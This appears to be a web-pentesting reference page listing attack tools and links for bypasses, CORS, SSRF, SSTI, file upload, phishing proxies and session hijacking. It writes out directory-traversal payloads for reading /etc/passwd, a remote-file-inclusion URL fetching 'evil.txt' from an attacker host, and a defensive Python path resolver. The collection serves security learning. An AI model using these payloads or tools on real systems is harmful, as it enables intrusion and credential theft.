{% content-ref url="broken-authentication.md" %} broken-authentication.md {% endcontent-ref %}
Broken Links
- broken-link-checker - Find broken links, missing images, etc. within your HTML.
- https://ahrefs.com/broken-link-checker
- https://brokenlinkcheck.com
- https://edoverflow.com/2017/broken-link-hijacking/
- https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d
- https://kathan19.gitbook.io/howtohunt/broken-link-hijacking/brokenlinkhijacking
Browser Attacks
- Beef - BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
- Metasploit; Browser-AutoPwn
- https://systemweakness.com/give-me-a-browser-ill-give-you-a-shell-de19811defa0?gi=a6af0aee993e
- Advanced Penetration Testing: Browser Pivoting - pg. 23
{% content-ref url="business-logic-flaws.md" %} business-logic-flaws.md {% endcontent-ref %}
Bypass Methodology
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Rate%20Limit.md
- byp4xx - Python script for bypassing HTTP 40X responses. Features: verb tampering, headers, #bugbountytips tricks and 2454 User-Agents.
- 403bypasser - Automates the techniques used to circumvent access control restrictions on target pages.
- bypass-403 - A simple script, written for the author's own use, for bypassing 403 responses.
{% content-ref url="clickjacking.md" %} clickjacking.md {% endcontent-ref %}
{% content-ref url="command-injection.md" %} command-injection.md {% endcontent-ref %}
CORS Misconfiguration
- Corsy - CORS Misconfiguration Scanner
- CORScanner - Fast CORS misconfiguration vulnerability scanner
- CORStest - A simple CORS misconfiguration scanner
- CorsMe - Cross Origin Resource Sharing MisConfiguration Scanner
- of-CORS - Truffle Security's tool suite for identifying and exploiting CORS misconfigurations on the internal networks of bug bounty targets using typosquatting.
- https://owasp.org/www-community/attacks/CORS_RequestPreflightScrutiny
- https://owasp.org/www-community/attacks/CORS_OriginHeaderScrutiny
- https://pentestbook.six2dez.com/enumeration/web/cors
- https://kathan19.gitbook.io/howtohunt/cors/cors
- https://xsleaks.dev/ - Huge resource around cross site leak vulnerabilities
{% content-ref url="csrf.md" %} csrf.md {% endcontent-ref %}
CRLF Injection
- https://owasp.org/www-community/vulnerabilities/CRLF_Injection
- CRLF-Injection-Scanner - Command line tool for testing CRLF injection on a list of domains.
- crlfuzz - A fast tool to scan for CRLF vulnerabilities, written in Go
- crlfmap - CRLFMap is a tool to find HTTP Splitting vulnerabilities
- https://pentestbook.six2dez.com/enumeration/web/crlf
Client-Side Template Injection
- ACSTIS - ACSTIS helps you to scan certain web applications for AngularJS Client-Side Template Injection (sometimes referred to as CSTI, sandbox escape or sandbox bypass). It supports scanning a single request but also crawling the entire web application for the AngularJS CSTI vulnerability.
{% content-ref url="deserialization.md" %} deserialization.md {% endcontent-ref %}
Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application. This might include application code and data, credentials for back-end systems, and sensitive operating system files.
Basics
- Simple attack
  - Linux system: ../../../etc/passwd
  - Windows system: ..\..\..\windows\win.ini
- Absolute path from the filesystem without traversal sequences
  - filename=/etc/passwd
- Nested traversal sequences
  - ....// or ....\/ reverts to ../ when a filter strips ../ only once
  - ....//....//....//etc/passwd
- Non-standard encoding
  - You might be able to use various non-standard encodings, such as ..%c0%af or ..%252f, to bypass the input filter.
  - ..%252f..%252f..%252fetc/passwd
- Valid start of path/base folder
  - filename=/var/www/images/../../../etc/passwd
- File extension null byte bypass
  - If an application requires that the user-supplied filename end with an expected file extension, such as .png, it might be possible to use a null byte to terminate the file path before the required extension.
  - filename=../../../etc/passwd%00.png
- dotdotpwn - DotDotPwn is a very flexible, intelligent fuzzer for discovering directory traversal vulnerabilities in software such as HTTP/FTP/TFTP servers and web platforms such as CMSs, ERPs, blogs, etc.
Resources
{% embed url="https://youtu.be/kkSzmhJD73s" %}
File inclusion vulnerabilities allow an attacker to include a file into the application's running code. In order to actually exploit a file inclusion vulnerability, we must be able to not only execute code, but also to write our shell payload somewhere.
{% tabs %}
{% tab title="Identification" %}
- Discovered the same way as directory traversals
- Locate parameters you can manipulate and attempt to use them to load arbitrary files
- We take it one step further and attempt to execute the contents of the file within the application
- Local file inclusion (LFI) occurs when the included file is loaded from the same web server.
- Remote file inclusion (RFI) occurs when the file is loaded from an external source.
  - Try changing the local path parameter to a URL.
  - http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt
{% endtab %}
{% tab title="Tools" %}
- LFISuite - LFI Suite is a fully automatic tool able to scan and exploit Local File Inclusion vulnerabilities using many different methods of attack
- Liffy - Local File Inclusion exploitation tool.
- Kadimus - Kadimus is a tool to check for and exploit LFI vulnerabilities, with a focus on PHP systems.
- fimap - Fimap is a small Python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in web apps.
{% endtab %}
{% tab title="Reference" %}
- LFI CheatSheet
- File Inclusion Vulnerability Guide
- https://xapax.github.io/security/#attacking_web_applications/local_file_inclusion/
- https://xapax.github.io/security/#attacking_web_applications/remote_file_inclusion/
- https://pentestbook.six2dez.com/enumeration/web/lfi-rfi
- Comprehensive Guide on Local File Inclusion (LFI)
- Comprehensive Guide to Remote File Inclusion (RFI)
- https://tryhackme.com/room/lfibasics
{% endtab %}
{% endtabs %}
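An added example (not code from this page or from any tool listed here) showing the defensive side of the traversal bypasses listed under Basics above and of the file-parameter-to-URL trick from the Identification tab: the naive strip filter that the nested-sequence bypass defeats, beside a canonicalise-then-check resolver that rejects every listed variant. The base directory, the function names and the sample filenames in the comments are assumptions.

```python
import posixpath
import re
from typing import Optional
from urllib.parse import unquote

# Assumed document root for the served files; adjust to the real deployment.
BASE_DIR = "/var/www/images"

# Anything that starts with a URL scheme (http:, php:, data:, ...) is not a local name.
_SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*:", re.IGNORECASE)


def naive_strip(user_filename: str) -> str:
    """The flawed filter the nested-sequence bypass targets: a single,
    non-recursive removal of '../', so '....//' collapses back into '../'."""
    return user_filename.replace("../", "")


def safe_resolve(user_filename: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Canonicalise a user-supplied filename and return the absolute path
    if it stays inside base_dir, otherwise None (reject, do not sanitise)."""
    decoded = user_filename
    try:
        # Decode until stable so double encoding (..%252f -> ..%2f -> ../) is
        # undone; strict decoding turns overlong UTF-8 (..%c0%af) into an error.
        for _ in range(3):
            step = unquote(decoded, errors="strict")
            if step == decoded:
                break
            decoded = step
    except UnicodeDecodeError:
        return None
    # A NUL would truncate the path in C-based file APIs (the %00.png bypass).
    if "\x00" in decoded:
        return None
    # Treat backslashes as separators so ..\..\ is recognised as traversal too.
    decoded = decoded.replace("\\", "/")
    # Reject absolute paths (even ones starting with base_dir, since
    # /var/www/images/../../../etc/passwd escapes anyway) and URLs (the RFI vector).
    if decoded.startswith("/") or _SCHEME_RE.match(decoded):
        return None
    # Resolve lexically against the base, then check containment; after
    # normalisation '....//' is just an odd directory name, not an escape.
    base = posixpath.normpath(base_dir)
    resolved = posixpath.normpath(posixpath.join(base, decoded))
    if resolved == base or resolved.startswith(base + "/"):
        return resolved
    return None
```

The containment check is lexical; on a real filesystem follow it with os.path.realpath so symlinks under the base directory cannot point outside it.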
File Upload
- fuxploider - File upload vulnerability scanner and exploitation tool.
- https://xapax.github.io/security/#attacking_web_applications/bypass_image_upload/
- https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html
- https://pentestbook.six2dez.com/enumeration/web/upload-bypasses
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20File%20Upload.md
- Comprehensive Guide on Unrestricted File Upload
- https://medium.com/@raymond-lind/ssrf-lfi-in-uploads-feature-321d83b93ec0
{% content-ref url="http-host-header-attacks.md" %} http-host-header-attacks.md {% endcontent-ref %}
{% content-ref url="http-request-smuggling.md" %} http-request-smuggling.md {% endcontent-ref %}
Input Fuzzing
- Wfuzz - Powerful Web application content fuzzer.
- FuzzDb - FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing.
- ffuf - A super fast web fuzzer written in Go.
- QsFuzz - Qsfuzz (Query String Fuzz) allows you to build your own rules to fuzz query strings and easily identify vulnerabilities.
- AFLplusplus - The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel & redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!
{% content-ref url="insecure-direct-object-reference.md" %} insecure-direct-object-reference.md {% endcontent-ref %}
LDAP Injection
- https://owasp.org/www-community/attacks/LDAP_Injection
- https://cheatsheetseries.owasp.org/cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html
- https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html#ldap-injection
- https://www.ldapexplorer.com/en/manual/109010000-ldap-filter-syntax.htm
Open Redirect Vulnerabilities
- OpenRedireX - A Fuzzer for OpenRedirect issues
- Oralyzer - Open Redirection Analyzer
- https://pentestbook.six2dez.com/enumeration/web/open-redirects
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md
- Comprehensive Guide on Open Redirect
- Open Redirect Vulnerabilities - Bug Bounty Hunting Essentials, pg.141
Prototype Pollution
- ppfuzz - A fast tool to scan for client-side prototype pollution vulnerabilities, written in Rust.
Security Misconfiguration
Security misconfigurations include:
- Poorly configured permissions on cloud services, like S3 buckets
- Having unnecessary features enabled, like services, pages, accounts or privileges
- Default accounts with unchanged passwords
- Error messages that are overly detailed and allow an attacker to find out more about the system
- Not using HTTP security headers, or revealing too much detail in the Server: HTTP header
- hamster-sidejack - Hamster is a tool for "sidejacking". It acts as a proxy server that replaces your cookies with session cookies stolen from somebody else, allowing you to hijack their sessions.
{% content-ref url="sql-injection/" %} sql-injection {% endcontent-ref %}
SSRF
- SSRF Bible - Ultimate Guide to SSRF vulnerabilities and attacks
- SSRF-Testing - SSRF (Server Side Request Forgery) testing resources
- Ground Control - This is a collection of scripts used to debug Server Side Request Forgery (SSRF), blind XSS, and insecure XXE processing vulnerabilities.
- SSRFire - An automated SSRF finder. Just give the domain name and your server and chill! ;) Also has options to find XSS and open redirects
- Gopherus - This tool generates gopher link for exploiting SSRF and gaining RCE in various servers
- https://tools.intigriti.io/redirector/ - SSRF payload redirect generator
- https://pentestbook.six2dez.com/enumeration/web/ssrf
- PayloadsAllTheThings/ServerSideRequestForgery
- https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
SSTI
- TPLmap - Server-Side Template Injection and Code Injection Detection and Exploitation Tool
- https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
- https://akenofu.gitbook.io/hackallthethings/web-applications/attacks/ssti
- https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
- https://github.com/ambionics/symfony-exploits
- https://medium.com/server-side-template-injection/server-side-template-injection-faf88d0c7f34
- https://tryhackme.com/room/learnssti
- Template Injection - Bug Bounty Hunting Essentials, pg.189
XPath Injection
- https://owasp.org/www-community/attacks/XPATH_Injection
- https://owasp.org/www-community/attacks/Blind_XPath_Injection
{% content-ref url="web-cache-poisoning.md" %} web-cache-poisoning.md {% endcontent-ref %}
- Evilginx2 - Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
- MITM Proxy - Mitmproxy is your swiss-army knife for debugging, testing, privacy measurements, and penetration testing. It can be used to intercept, inspect, modify and replay web traffic such as HTTP/1, HTTP/2, WebSockets, or any other SSL/TLS-protected protocols.
{% content-ref url="web-sockets.md" %} web-sockets.md {% endcontent-ref %}
{% content-ref url="xxe-xml-external-entity-attacks.md" %} xxe-xml-external-entity-attacks.md {% endcontent-ref %}
{% content-ref url="owasp-7-xss-cross-site-scripting.md" %} owasp-7-xss-cross-site-scripting.md {% endcontent-ref %}